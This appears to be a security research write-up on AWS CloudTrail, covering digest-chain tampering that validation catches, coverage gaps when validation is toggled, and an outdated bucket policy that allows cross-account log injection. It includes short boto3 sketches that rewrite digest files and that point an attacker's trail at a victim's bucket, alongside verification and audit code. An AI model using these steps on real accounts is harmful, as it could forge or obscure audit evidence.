CloudTrail

Successful research comprises countless failures. These are some of mine, documented :)

Fail I - Breaking Digest Integrity Chain

Attempt Goal: The first file of the digest chain has several fields set to null, including previousDigestHashValue. The idea was to set those same fields to null in newer digest files too, in an attempt to break the integrity chain: if each file loses its pointer to the previous one, the linked list falls apart.

{
  "awsAccountId": "800303608826",
  "digestStartTime": "2022-07-09T14:04:50Z",
  "digestEndTime": "2022-07-09T15:04:50Z",
  "digestS3Bucket": "aws-cloudtrail-logs-800303608826-76f246ce",
  "digestS3Object": "AWSLogs/800303608826/CloudTrail-Digest/us-east-1/2022/07/09/800303608826_CloudTrail-Digest_us-east-1_try_us-east-1_20220709T150450Z.json.gz",
  "digestPublicKeyFingerprint": "6901013c91c7a52c57e083fa423e1f08",
  "digestSignatureAlgorithm": "SHA256withRSA",
  "newestEventTime": null,
  "oldestEventTime": null,
  "previousDigestS3Bucket": null,
  "previousDigestS3Object": null,
  "previousDigestHashValue": null,
  "previousDigestHashAlgorithm": null,
  "previousDigestSignature": null,
  "logFiles": []
}

Process: Started a new trail with log file validation enabled. Since a digest file is delivered roughly once an hour, it was a long waiting game. I didn't touch the first digest file, since all of its linking fields were already null. Subsequent digest files contain those fields with their legitimate values. Example:

{
  "awsAccountId": "111122223333",
  "digestStartTime": "2015-08-17T14:01:31Z",
  "digestEndTime": "2015-08-17T15:01:31Z",
  "digestS3Bucket": "S3-bucket-name",
  "digestS3Object": "AWSLogs/111122223333/CloudTrail-Digest/us-east-2/2015/08/17/111122223333_CloudTrail-Digest_us-east-2_your-trail-name_us-east-2_20150817T150131Z.json.gz",
  "digestPublicKeyFingerprint": "31e8b5433410dfb61a9dc45cc65b22ff",
  "digestSignatureAlgorithm": "SHA256withRSA",
  "newestEventTime": "2015-08-17T14:52:27Z",
  "oldestEventTime": "2015-08-17T14:42:27Z",
  "previousDigestS3Bucket": "S3-bucket-name",
  "previousDigestS3Object": "AWSLogs/111122223333/CloudTrail-Digest/us-east-2/2015/08/17/111122223333_CloudTrail-Digest_us-east-2_your-trail-name_us-east-2_20150817T140131Z.json.gz",
  "previousDigestHashValue": "97fb791cf91ffc440d274f8190dbdd9aa09c34432aba82739df18b6d3c13df2d",
  "previousDigestHashAlgorithm": "SHA-256",
  "previousDigestSignature": "50887ccffad4c002b97caa37cc9dc626e3c680207d41d27fa5835458e066e0d3652fc4dfc30937e4d5f4cc7f796e7a258fb50a43ac427f2237f6e505d4efaf373d156e15e3b68dea9f58111d395b62628d6bd367a9024d2183b5c5f6e19466d3a996b92df705bc997b8a0e13430f241d733cf95df4e41bb6c304c3f58363043572ea57a27085639ce187e679c0d81c7519b1184fa77fb7ab0b0e40a32dace6e1eefc3995c5ae182da49b62b26398cebb52a2201a6387b75b89c83e5570bcb9bba6c34a80f2f00a1c6ebe07d1ff149eccd812dc805bb3eeff6657db32a6cb48d2d096404eb76181877bc6ebb8cd0b23f823200155b2fd8848d428e46e8456328a",
  "logFiles": [
    {
      "s3Bucket": "S3-bucket-name",
      "s3Object": "AWSLogs/111122223333/CloudTrail/us-east-2/2015/08/17/111122223333_CloudTrail_us-east-2_20150817T1445Z_9nYN7gp2eWAJHIfT.json.gz",
      "hashValue": "9bb6196fc6b84d6f075a56548feca262bd99ba3c2de41b618e5b6e22c1fc71f6",
      "hashAlgorithm": "SHA-256",
      "newestEventTime": "2015-08-17T14:52:27Z",
      "oldestEventTime": "2015-08-17T14:42:27Z"
    }
  ]
}

The idea here was to modify this JSON: set logFiles to an empty list [] and null out every field matching the previous* pattern. The thought process was that the moment those fields become null, the linked list breaks and each node becomes independent.
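
The tampering itself is mechanically simple. A rough sketch of what I mean, in Python with boto3 (bucket and object key below are placeholders):

# Sketch of the tampering attempt: null out the previous* fields, empty
# logFiles, and write the digest back. Bucket/key are placeholders.
import gzip
import json

import boto3

BUCKET = "aws-cloudtrail-logs-..."          # placeholder
KEY = "AWSLogs/.../CloudTrail-Digest/..."   # placeholder digest object key

s3 = boto3.client("s3")
digest = json.loads(gzip.decompress(
    s3.get_object(Bucket=BUCKET, Key=KEY)["Body"].read()))

digest["logFiles"] = []
for field in list(digest):
    if field.startswith("previous"):
        digest[field] = None

# Note: this overwrite also drops the object's x-amz-meta-signature
# metadata unless it is explicitly copied back, which matters later.
s3.put_object(Bucket=BUCKET, Key=KEY,
              Body=gzip.compress(json.dumps(digest).encode()))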

Running the CloudTrail validation check (the aws cloudtrail validate-logs CLI command) flagged the modified digest file with an invalid-signature error: the tampering was detected.

This meant there is a signature check beyond the fields inside the file itself. Reading the validation documentation in detail shows that each digest file's signature is stored under the x-amz-meta-signature key in the S3 object metadata of that digest file.

String to be signed =

Digest_End_Timestamp_in_UTC_Extended_format + '\n' +
Current_Digest_File_S3_Path + '\n' +
Hex(Sha256(current-digest-file-content)) + '\n' +
Previous_digest_signature_in_hex 
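
To make the check concrete, here is a minimal sketch of the documented verification in Python (boto3 plus the cryptography package). The bucket and key are placeholders; hashing the decompressed digest bytes and substituting the literal string 'null' for a chain's first file are my reading of how the AWS CLI handles it:

# Minimal sketch of the documented digest-signature check.
import gzip
import hashlib
import json

import boto3
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.serialization import load_der_public_key

BUCKET = "aws-cloudtrail-logs-..."          # placeholder
KEY = "AWSLogs/.../CloudTrail-Digest/..."   # placeholder digest object key

s3 = boto3.client("s3")
ct = boto3.client("cloudtrail")

obj = s3.get_object(Bucket=BUCKET, Key=KEY)
signature = bytes.fromhex(obj["Metadata"]["signature"])  # x-amz-meta-signature
digest_raw = gzip.decompress(obj["Body"].read())         # digests are gzipped
digest = json.loads(digest_raw)

# The string to be signed, built exactly as in the docs above. Note that
# the S3 path baked into it comes from fields inside the digest file.
data_to_sign = "\n".join([
    digest["digestEndTime"],
    digest["digestS3Bucket"] + "/" + digest["digestS3Object"],
    hashlib.sha256(digest_raw).hexdigest(),
    digest["previousDigestSignature"] or "null",  # first file has no predecessor
]).encode()

# Fetch the CloudTrail public key valid for this digest window, matching
# the fingerprint recorded in the digest file itself.
keys = ct.list_public_keys(StartTime=digest["digestStartTime"],
                           EndTime=digest["digestEndTime"])["PublicKeyList"]
key_der = next(k["Value"] for k in keys
               if k["Fingerprint"] == digest["digestPublicKeyFingerprint"])

try:
    load_der_public_key(key_der).verify(
        signature, data_to_sign, padding.PKCS1v15(), hashes.SHA256())
    print("signature OK")
except InvalidSignature:
    print("INVALID: signature mismatch")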

The next attempt was to fake everything: the digest end timestamp, the file's S3 path, the digest file content, and the previous digest signature, in order to reproduce an input string for which CloudTrail's private key had already produced a valid signature.

To do so, I modified the digest file, copy-pasted the values from the first digest file (which had everything null), and even copied the x-amz-meta-signature metadata value from the previous digest file, in an attempt to reproduce the exact input string of that earlier digest file.

Running validate-logs on the new digest file gave a different error: INVALID: has been moved from its original location. This means the tool also checks that the digestS3Bucket and digestS3Object recorded inside the digest file match the object's actual location before it validates the signing string.
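
The check presumably boils down to something like this (my guess at the logic, not AWS's actual code):

# Sketch of the location check validate-logs appears to perform: the
# bucket/key recorded *inside* the digest file must match where the object
# actually lives, so a digest can't be replayed from another path.
def digest_in_original_location(digest: dict, actual_bucket: str, actual_key: str) -> bool:
    return (digest["digestS3Bucket"] == actual_bucket
            and digest["digestS3Object"] == actual_key)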

That left no way for me to modify a digest file undetected, which ended the hope of finding something interesting here.

Fail II - Stop and Start Validation

Attempt Goal: Stop log file validation for a short time, then turn it back on, and observe how the digest chain reacts to the change.

Process: Enabled digest delivery for some time, then stopped validation and restarted it a while later. The observation was that while validation was active, CloudTrail kept extending the linked list, adding new nodes with their back-references as time went on.

Once you stop validation, digest delivery halts abruptly. Since the last digest file delivered holds no forward references, stopping validation has no visible effect on the existing chain.

Turning validation back on showed something interesting. Digest delivery resumes, but the first digest file delivered after re-enabling validation has no relationship to the previous digest file. It's as if the new digest file has forgotten everything and is starting fresh.

This means the linked list has broken in two: the bucket now holds two chains, one created at the start and terminated abruptly when validation was stopped, and a newer one that began when validation was re-enabled.

Running the validate-logs call now shows every digest file, and the log files they reference, as valid. Only the window when log validation was off is unprotected: logs delivered during that gap are covered by no digest, so tampering with them cannot be detected.
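
A practical takeaway: you can walk the digest objects yourself and flag exactly where a chain restarts, i.e. where a coverage gap begins. A sketch (bucket and prefix are placeholders):

# Sketch: list digest files in delivery order and flag chain restarts, i.e.
# digests (other than the very first) whose previous* links are null.
import gzip
import json

import boto3

BUCKET = "aws-cloudtrail-logs-..."                            # placeholder
PREFIX = "AWSLogs/111122223333/CloudTrail-Digest/us-east-1/"  # placeholder

s3 = boto3.client("s3")
keys = []
for page in s3.get_paginator("list_objects_v2").paginate(Bucket=BUCKET,
                                                         Prefix=PREFIX):
    keys += [o["Key"] for o in page.get("Contents", [])]

for i, key in enumerate(sorted(keys)):  # digest key names sort chronologically
    digest = json.loads(gzip.decompress(
        s3.get_object(Bucket=BUCKET, Key=key)["Body"].read()))
    if i > 0 and digest["previousDigestS3Object"] is None:
        print(f"chain restart at {key}: logs before "
              f"{digest['digestStartTime']} may sit in a coverage gap")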

Partial Win III - Insecure CloudTrail Bucket Policy

Attempt Goal: Review the bucket policy of the S3 bucket where logs are stored, in an attempt to deliver CloudTrail logs into an unauthorised third-party bucket.

Process: AWS has recently updated the default bucket policy for CloudTrail. Buckets still using the older policy carry unsafe permissions that allow anyone on the internet to deliver their own CloudTrail logs into your bucket.

Unsafe policy:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AWSCloudTrailAclCheck20150319",
            "Effect": "Allow",
            "Principal": {
                "Service": "cloudtrail.amazonaws.com"
            },
            "Action": "s3:GetBucketAcl",
            "Resource": "arn:aws:s3:::bucket_name"
        },
        {
            "Sid": "AWSCloudTrailWrite20150319",
            "Effect": "Allow",
            "Principal": {
                "Service": "cloudtrail.amazonaws.com"
            },
            "Action": "s3:PutObject",
            "Resource": "arn:aws:s3:::bucket_name/*",
            "Condition": {
                "StringEquals": {
                    "s3:x-amz-acl": "bucket-owner-full-control"
                }
            }
        }
    ]
}

This policy has no restriction on whose behalf the logs are written: the cloudtrail.amazonaws.com service principal can write for any AWS account, allowing anyone on the internet to point their CT logs at this bucket.
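
Exploiting the old policy from an attacker-controlled account would look roughly like this (trail and bucket names are placeholders):

# Sketch: from an attacker-controlled account, point a trail at the victim's
# bucket. With the old policy, cloudtrail.amazonaws.com may write for anyone.
import boto3

ct = boto3.client("cloudtrail")
ct.create_trail(
    Name="innocuous-trail",                  # placeholder trail name
    S3BucketName="victim-cloudtrail-bucket"  # bucket with the unsafe policy
)
ct.start_logging(Name="innocuous-trail")
# The victim's bucket now receives AWSLogs/<attacker-account-id>/... objects.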

AWS's new Default Policy:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AWSCloudTrailAclCheck20150319",
            "Effect": "Allow",
            "Principal": {"Service": "cloudtrail.amazonaws.com"},
            "Action": "s3:GetBucketAcl",
            "Resource": "arn:aws:s3:::myBucketName",
            "Condition": {
                "StringEquals": {
                    "aws:SourceArn": "arn:aws:cloudtrail:region:myAccountID:trail/trailName"
                }
            }
        },
        {
            "Sid": "AWSCloudTrailWrite20150319",
            "Effect": "Allow",
            "Principal": {"Service": "cloudtrail.amazonaws.com"},
            "Action": "s3:PutObject",
            "Resource": "arn:aws:s3:::myBucketName/[optionalPrefix]/AWSLogs/myAccountID/*",
            "Condition": {
                "StringEquals": {
                    "s3:x-amz-acl": "bucket-owner-full-control",
                    "aws:SourceArn": "arn:aws:cloudtrail:region:myAccountID:trail/trailName"
                }
            }
        }
    ]
}

The new policy pins both statements with an aws:SourceArn condition (and scopes the object path to myAccountID), so only the named trail in the named account can deliver logs here, removing the cross-account risk.
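
To audit your own buckets for the old policy, check whether the PutObject statement is pinned with aws:SourceArn. A sketch (bucket name is a placeholder):

# Sketch: flag CloudTrail bucket policies whose PutObject statement lacks an
# aws:SourceArn (or aws:SourceAccount) condition. Bucket is a placeholder.
import json

import boto3

s3 = boto3.client("s3")
policy = json.loads(
    s3.get_bucket_policy(Bucket="my-cloudtrail-bucket")["Policy"])

for stmt in policy["Statement"]:
    if stmt.get("Principal") != {"Service": "cloudtrail.amazonaws.com"}:
        continue
    if "s3:PutObject" not in json.dumps(stmt.get("Action", "")):
        continue
    cond = json.dumps(stmt.get("Condition", {}))
    if "aws:SourceArn" not in cond and "aws:SourceAccount" not in cond:
        print("UNSAFE: PutObject statement is not pinned to a trail/account")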

What could have been gained from this?

  • Insert fake logs from another account into your CT bucket, which might be the source of truth for your account/org.

  • Insert KMS-encrypted logs into your bucket, which would raise alarms since the bucket owner cannot decrypt logs encrypted with someone else's key.
